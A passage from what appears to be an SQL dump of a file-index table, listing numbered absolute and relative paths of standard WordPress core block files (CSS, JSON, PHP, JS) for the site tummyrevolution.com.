ov/tummyrevolution.com/wp-includes/blocks/comment-author-name/block.json','wp-includes/blocks/comment-author-name/block.json'),(14653,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-author-name.php','wp-includes/blocks/comment-author-name.php'),(14654,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/block.json','wp-includes/blocks/comment-content/block.json'),(14655,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/style-rtl.css','wp-includes/blocks/comment-content/style-rtl.css'),(14656,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/style-rtl.min.css','wp-includes/blocks/comment-content/style-rtl.min.css'),(14657,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/style.css','wp-includes/blocks/comment-content/style.css'),(14658,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content/style.min.css','wp-includes/blocks/comment-content/style.min.css'),(14659,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-content.php','wp-includes/blocks/comment-content.php'),(14660,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-date/block.json','wp-includes/blocks/comment-date/block.json'),(14661,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-date.php','wp-includes/blocks/comment-date.php'),(14662,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-edit-link/block.json','wp-includes/blocks/comment-edit-link/block.json'),(14663,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-edit-link.php','wp-includes/blocks/comment-edit-link.php'),(14664,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-reply-link/block.json','wp-includes/blocks/comment-reply-link/block.json'),(14665,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-reply-link.php','wp-includes/blocks/comment-reply-link.php'),(14666,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/block.json','wp-includes/blocks/comment-template/block.json'),(14667,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style-rtl.css','wp-includes/blocks/comment-template/style-rtl.css'),(14668,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style-rtl.min.css','wp-includes/blocks/comment-template/style-rtl.min.css'),(14669,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style.css','wp-includes/blocks/comment-template/style.css'),(14670,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template/style.min.css','wp-includes/blocks/comment-template/style.min.css'),(14671,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comment-template.php','wp-includes/blocks/comment-template.php'),(14672,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/block.json','wp-includes/blocks/comments/block.json'),(14673,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor-rtl.css','wp-includes/blocks/comments/editor-rtl.css'),(14674,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor-rtl.min.css','wp-includes/blocks/comments/editor-rtl.min.css'),(14675,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor.css','wp-includes/blocks/comments/editor.css'),(14676,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/editor.min.css','wp-includes/blocks/comments/editor.min.css'),(14677,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style-rtl.css','wp-includes/blocks/comments/style-rtl.css'),(14678,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style-rtl.min.css','wp-includes/blocks/comments/style-rtl.min.css'),(14679,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style.css','wp-includes/blocks/comments/style.css'),(14680,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments/style.min.css','wp-includes/blocks/comments/style.min.css'),(14681,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/block.json','wp-includes/blocks/comments-pagination/block.json'),(14682,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor-rtl.css','wp-includes/blocks/comments-pagination/editor-rtl.css'),(14683,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor-rtl.min.css','wp-includes/blocks/comments-pagination/editor-rtl.min.css'),(14684,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor.css','wp-includes/blocks/comments-pagination/editor.css'),(14685,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/editor.min.css','wp-includes/blocks/comments-pagination/editor.min.css'),(14686,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style-rtl.css','wp-includes/blocks/comments-pagination/style-rtl.css'),(14687,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style-rtl.min.css','wp-includes/blocks/comments-pagination/style-rtl.min.css'),(14688,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style.css','wp-includes/blocks/comments-pagination/style.css'),(14689,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination/style.min.css','wp-includes/blocks/comments-pagination/style.min.css'),(14690,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-next/block.json','wp-includes/blocks/comments-pagination-next/block.json'),(14691,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-next.php','wp-includes/blocks/comments-pagination-next.php'),(14692,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/block.json','wp-includes/blocks/comments-pagination-numbers/block.json'),(14693,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/editor-rtl.css','wp-includes/blocks/comments-pagination-numbers/editor-rtl.css'),(14694,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/editor-rtl.min.css','wp-includes/blocks/comments-pagination-numbers/editor-rtl.min.css'),(14695,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/editor.css','wp-includes/blocks/comments-pagination-numbers/editor.css'),(14696,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers/editor.min.css','wp-includes/blocks/comments-pagination-numbers/editor.min.css'),(14697,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-numbers.php','wp-includes/blocks/comments-pagination-numbers.php'),(14698,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-previous/block.json','wp-includes/blocks/comments-pagination-previous/block.json'),(14699,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination-previous.php','wp-includes/blocks/comments-pagination-previous.php'),(14700,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-pagination.php','wp-includes/blocks/comments-pagination.php'),(14701,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-title/block.json','wp-includes/blocks/comments-title/block.json'),(14702,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-title/editor-rtl.css','wp-includes/blocks/comments-title/editor-rtl.css'),(14703,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-title/editor-rtl.min.css','wp-includes/blocks/comments-title/editor-rtl.min.css'),(14704,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-title/editor.css','wp-includes/blocks/comments-title/editor.css'),(14705,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-title/editor.min.css','wp-includes/blocks/comments-title/editor.min.css'),(14706,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments-title.php','wp-includes/blocks/comments-title.php'),(14707,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/comments.php','wp-includes/blocks/comments.php'),(14708,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/block.json','wp-includes/blocks/cover/block.json'),(14709,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/editor-rtl.css','wp-includes/blocks/cover/editor-rtl.css'),(14710,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/editor-rtl.min.css','wp-includes/blocks/cover/editor-rtl.min.css'),(14711,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/editor.css','wp-includes/blocks/cover/editor.css'),(14712,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/editor.min.css','wp-includes/blocks/cover/editor.min.css'),(14713,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/style-rtl.css','wp-includes/blocks/cover/style-rtl.css'),(14714,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/style-rtl.min.css','wp-includes/blocks/cover/style-rtl.min.css'),(14715,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/style.css','wp-includes/blocks/cover/style.css'),(14716,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover/style.min.css','wp-includes/blocks/cover/style.min.css'),(14717,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/cover.php','wp-includes/blocks/cover.php'),(14718,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/block.json','wp-includes/blocks/details/block.json'),(14719,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor-rtl.css','wp-includes/blocks/details/editor-rtl.css'),(14720,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor-rtl.min.css','wp-includes/blocks/details/editor-rtl.min.css'),(14721,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor.css','wp-includes/blocks/details/editor.css'),(14722,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/editor.min.css','wp-includes/blocks/details/editor.min.css'),(14723,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style-rtl.css','wp-includes/blocks/details/style-rtl.css'),(14724,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style-rtl.min.css','wp-includes/blocks/details/style-rtl.min.css'),(14725,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style.css','wp-includes/blocks/details/style.css'),(14726,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/details/style.min.css','wp-includes/blocks/details/style.min.css'),(14727,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/block.json','wp-includes/blocks/embed/block.json'),(14728,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor-rtl.css','wp-includes/blocks/embed/editor-rtl.css'),(14729,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor-rtl.min.css','wp-includes/blocks/embed/editor-rtl.min.css'),(14730,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor.css','wp-includes/blocks/embed/editor.css'),(14731,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/editor.min.css','wp-includes/blocks/embed/editor.min.css'),(14732,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style-rtl.css','wp-includes/blocks/embed/style-rtl.css'),(14733,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style-rtl.min.css','wp-includes/blocks/embed/style-rtl.min.css'),(14734,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style.css','wp-includes/blocks/embed/style.css'),(14735,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/style.min.css','wp-includes/blocks/embed/style.min.css'),(14736,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/theme-rtl.css','wp-includes/blocks/embed/theme-rtl.css'),(14737,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/theme-rtl.min.css','wp-includes/blocks/embed/theme-rtl.min.css'),(14738,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/theme.css','wp-includes/blocks/embed/theme.css'),(14739,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/embed/theme.min.css','wp-includes/blocks/embed/theme.min.css'),(14740,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/block.json','wp-includes/blocks/file/block.json'),(14741,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor-rtl.css','wp-includes/blocks/file/editor-rtl.css'),(14742,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor-rtl.min.css','wp-includes/blocks/file/editor-rtl.min.css'),(14743,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor.css','wp-includes/blocks/file/editor.css'),(14744,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/editor.min.css','wp-includes/blocks/file/editor.min.css'),(14745,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style-rtl.css','wp-includes/blocks/file/style-rtl.css'),(14746,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style-rtl.min.css','wp-includes/blocks/file/style-rtl.min.css'),(14747,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style.css','wp-includes/blocks/file/style.css'),(14748,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/style.min.css','wp-includes/blocks/file/style.min.css'),(14749,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.asset.php','wp-includes/blocks/file/view.asset.php'),(14750,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.js','wp-includes/blocks/file/view.js'),(14751,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.min.asset.php','wp-includes/blocks/file/view.min.asset.php'),(14752,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file/view.min.js','wp-includes/blocks/file/view.min.js'),(14753,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/file.php','wp-includes/blocks/file.php'),(14754,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/block.json','wp-includes/blocks/footnotes/block.json'),(14755,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style-rtl.css','wp-includes/blocks/footnotes/style-rtl.css'),(14756,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style-rtl.min.css','wp-includes/blocks/footnotes/style-rtl.min.css'),(14757,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style.css','wp-includes/blocks/footnotes/style.css'),(14758,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes/style.min.css','wp-includes/blocks/footnotes/style.min.css'),(14759,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/footnotes.php','wp-includes/blocks/footnotes.php'),(14760,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/block.json','wp-includes/blocks/freeform/block.json'),(14761,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor-rtl.css','wp-includes/blocks/freeform/editor-rtl.css'),(14762,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor-rtl.min.css','wp-includes/blocks/freeform/editor-rtl.min.css'),(14763,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor.css','wp-includes/blocks/freeform/editor.css'),(14764,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/freeform/editor.min.css','wp-includes/blocks/freeform/editor.min.css'),(14765,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/block.json','wp-includes/blocks/gallery/block.json'),(14766,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor-rtl.css','wp-includes/blocks/gallery/editor-rtl.css'),(14767,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor-rtl.min.css','wp-includes/blocks/gallery/editor-rtl.min.css'),(14768,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor.css','wp-includes/blocks/gallery/editor.css'),(14769,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/editor.min.css','wp-includes/blocks/gallery/editor.min.css'),(14770,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/style-rtl.css','wp-includes/blocks/gallery/style-rtl.css'),(14771,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/style-rtl.min.css','wp-includes/blocks/gallery/style-rtl.min.css'),(14772,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/style.css','wp-includes/blocks/gallery/style.css'),(14773,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/style.min.css','wp-includes/blocks/gallery/style.min.css'),(14774,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/theme-rtl.css','wp-includes/blocks/gallery/theme-rtl.css'),(14775,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/theme-rtl.min.css','wp-includes/blocks/gallery/theme-rtl.min.css'),(14776,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/theme.css','wp-includes/blocks/gallery/theme.css'),(14777,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery/theme.min.css','wp-includes/blocks/gallery/theme.min.css'),(14778,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/gallery.php','wp-includes/blocks/gallery.php'),(14779,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/block.json','wp-includes/blocks/group/block.json'),(14780,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/editor-rtl.css','wp-includes/blocks/group/editor-rtl.css'),(14781,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/editor-rtl.min.css','wp-includes/blocks/group/editor-rtl.min.css'),(14782,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/editor.css','wp-includes/blocks/group/editor.css'),(14783,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/editor.min.css','wp-includes/blocks/group/editor.min.css'),(14784,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/style-rtl.css','wp-includes/blocks/group/style-rtl.css'),(14785,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/style-rtl.min.css','wp-includes/blocks/group/style-rtl.min.css'),(14786,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/style.css','wp-includes/blocks/group/style.css'),(14787,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/style.min.css','wp-includes/blocks/group/style.min.css'),(14788,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme-rtl.css','wp-includes/blocks/group/theme-rtl.css'),(14789,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme-rtl.min.css','wp-includes/blocks/group/theme-rtl.min.css'),(14790,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme.css','wp-includes/blocks/group/theme.css'),(14791,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/group/theme.min.css','wp-includes/blocks/group/theme.min.css'),(14792,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/block.json','wp-includes/blocks/heading/block.json'),(14793,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style-rtl.css','wp-includes/blocks/heading/style-rtl.css'),(14794,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style-rtl.min.css','wp-includes/blocks/heading/style-rtl.min.css'),(14795,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style.css','wp-includes/blocks/heading/style.css'),(14796,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading/style.min.css','wp-includes/blocks/heading/style.min.css'),(14797,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/heading.php','wp-includes/blocks/heading.php'),(14798,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/home-link/block.json','wp-includes/blocks/home-link/block.json'),(14799,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/home-link.php','wp-includes/blocks/home-link.php'),(14800,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/block.json','wp-includes/blocks/html/block.json'),(14801,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor-rtl.css','wp-includes/blocks/html/editor-rtl.css'),(14802,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor-rtl.min.css','wp-includes/blocks/html/editor-rtl.min.css'),(14803,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor.css','wp-includes/blocks/html/editor.css'),(14804,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/html/editor.min.css','wp-includes/blocks/html/editor.min.css'),(14805,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/block.json','wp-includes/blocks/image/block.json'),(14806,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor-rtl.css','wp-includes/blocks/image/editor-rtl.css'),(14807,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor-rtl.min.css','wp-includes/blocks/image/editor-rtl.min.css'),(14808,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor.css','wp-includes/blocks/image/editor.css'),(14809,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/editor.min.css','wp-includes/blocks/image/editor.min.css'),(14810,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style-rtl.css','wp-includes/blocks/image/style-rtl.css'),(14811,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style-rtl.min.css','wp-includes/blocks/image/style-rtl.min.css'),(14812,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style.css','wp-includes/blocks/image/style.css'),(14813,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/style.min.css','wp-includes/blocks/image/style.min.css'),(14814,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/theme-rtl.css','wp-includes/blocks/image/theme-rtl.css'),(14815,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/theme-rtl.min.css','wp-includes/blocks/image/theme-rtl.min.css'),(14816,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/theme.css','wp-includes/blocks/image/theme.css'),(14817,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/theme.min.css','wp-includes/blocks/image/theme.min.css'),(14818,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/view.asset.php','wp-includes/blocks/image/view.asset.php'),(14819,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/view.js','wp-includes/blocks/image/view.js'),(14820,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/view.min.asset.php','wp-includes/blocks/image/view.min.asset.php'),(14821,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image/view.min.js','wp-includes/blocks/image/view.min.js'),(14822,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/image.php','wp-includes/blocks/image.php'),(14823,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/index.php','wp-includes/blocks/index.php'),(14824,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/block.json','wp-includes/blocks/latest-comments/block.json'),(14825,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style-rtl.css','wp-includes/blocks/latest-comments/style-rtl.css'),(14826,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style-rtl.min.css','wp-includes/blocks/latest-comments/style-rtl.min.css'),(14827,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style.css','wp-includes/blocks/latest-comments/style.css'),(14828,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments/style.min.css','wp-includes/blocks/latest-comments/style.min.css'),(14829,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-comments.php','wp-includes/blocks/latest-comments.php'),(14830,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/block.json','wp-includes/blocks/latest-posts/block.json'),(14831,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/editor-rtl.css','wp-includes/blocks/latest-posts/editor-rtl.css'),(14832,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/editor-rtl.min.css','wp-includes/blocks/latest-posts/editor-rtl.min.css'),(14833,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/editor.css','wp-includes/blocks/latest-posts/editor.css'),(14834,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/editor.min.css','wp-includes/blocks/latest-posts/editor.min.css'),(14835,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/style-rtl.css','wp-includes/blocks/latest-posts/style-rtl.css'),(14836,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/style-rtl.min.css','wp-includes/blocks/latest-posts/style-rtl.min.css'),(14837,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/style.css','wp-includes/blocks/latest-posts/style.css'),(14838,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts/style.min.css','wp-includes/blocks/latest-posts/style.min.css'),(14839,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/latest-posts.php','wp-includes/blocks/latest-posts.php'),(14840,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/legacy-widget/block.json','wp-includes/blocks/legacy-widget/block.json'),(14841,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/legacy-widget.php','wp-includes/blocks/legacy-widget.php'),(14842,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/block.json','wp-includes/blocks/list/block.json'),(14843,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style-rtl.css','wp-includes/blocks/list/style-rtl.css'),(14844,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style-rtl.min.css','wp-includes/blocks/list/style-rtl.min.css'),(14845,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style.css','wp-includes/blocks/list/style.css'),(14846,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list/style.min.css','wp-includes/blocks/list/style.min.css'),(14847,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/list-item/block.json','wp-includes/blocks/list-item/block.json'),(14848,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/loginout/block.json','wp-includes/blocks/loginout/block.json'),(14849,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/loginout.php','wp-includes/blocks/loginout.php'),(14850,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/block.json','wp-includes/blocks/media-text/block.json'),(14851,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor-rtl.css','wp-includes/blocks/media-text/editor-rtl.css'),(14852,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor-rtl.min.css','wp-includes/blocks/media-text/editor-rtl.min.css'),(14853,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor.css','wp-includes/blocks/media-text/editor.css'),(14854,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/editor.min.css','wp-includes/blocks/media-text/editor.min.css'),(14855,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style-rtl.css','wp-includes/blocks/media-text/style-rtl.css'),(14856,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style-rtl.min.css','wp-includes/blocks/media-text/style-rtl.min.css'),(14857,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style.css','wp-includes/blocks/media-text/style.css'),(14858,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/media-text/style.min.css','wp-includes/blocks/media-text/style.min.css'),(14859,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/missing/block.json','wp-includes/blocks/missing/block.json'),(14860,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/block.json','wp-includes/blocks/more/block.json'),(14861,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor-rtl.css','wp-includes/blocks/more/editor-rtl.css'),(14862,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor-rtl.min.css','wp-includes/blocks/more/editor-rtl.min.css'),(14863,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor.css','wp-includes/blocks/more/editor.css'),(14864,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/more/editor.min.css','wp-includes/blocks/more/editor.min.css'),(14865,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/block.json','wp-includes/blocks/navigation/block.json'),(14866,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor-rtl.css','wp-includes/blocks/navigation/editor-rtl.css'),(14867,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor-rtl.min.css','wp-includes/blocks/navigation/editor-rtl.min.css'),(14868,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor.css','wp-includes/blocks/navigation/editor.css'),(14869,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/editor.min.css','wp-includes/blocks/navigation/editor.min.css'),(14870,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style-rtl.css','wp-includes/blocks/navigation/style-rtl.css'),(14871,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style-rtl.min.css','wp-includes/blocks/navigation/style-rtl.min.css'),(14872,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style.css','wp-includes/blocks/navigation/style.css'),(14873,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/style.min.css','wp-includes/blocks/navigation/style.min.css'),(14874,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view-modal.asset.php','wp-includes/blocks/navigation/view-modal.asset.php'),(14875,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view-modal.min.asset.php','wp-includes/blocks/navigation/view-modal.min.asset.php'),(14876,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.asset.php','wp-includes/blocks/navigation/view.asset.php'),(14877,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.js','wp-includes/blocks/navigation/view.js'),(14878,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.min.asset.php','wp-includes/blocks/navigation/view.min.asset.php'),(14879,'/home/tummmyov/tummyrevolution.com/wp-includes/blocks/navigation/view.min.js','wp-includes/blocks/navigation/view.min.js'),(14880,'/h